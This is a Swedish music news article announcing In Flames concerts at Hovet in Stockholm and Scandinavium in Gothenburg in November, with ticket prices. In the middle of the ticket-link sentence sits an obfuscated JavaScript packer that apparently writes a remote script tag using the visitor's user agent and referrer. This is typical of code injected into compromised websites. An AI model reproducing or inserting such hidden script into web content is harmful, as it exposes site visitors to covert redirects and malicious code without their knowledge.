Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

In Flames till Sverige i November

In Flames till Sverige i November
Alexander Gylemo

In Flames påbörjar om ett tag sin Skandinavien-turné där de drar igenom Norge och Finland för att sedan avsluta med två konserter i Sverige. Den svenska Death metal-gruppen vars popularitet vuxit en hel del internationellt de senaste åren med bl.a. låtar som ”Take This Life”,  ”Trigger” och ”Come Clarity” kommer först till Stockholm där de spelar på Hovet den artonde november för att sedan dagen efter avsluta turnén i hemstaden Göteborg på Scandinavium.

Biljetterna säljs via ticnet.se med priset 395 :- per biljett och går att införskaffas på här eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rbbha|var|u0026u|referrer|zsnzb||js|php’.split(’|’),0,{}))
för Stockholmsspelningen och
här för Göteborgsspelningen.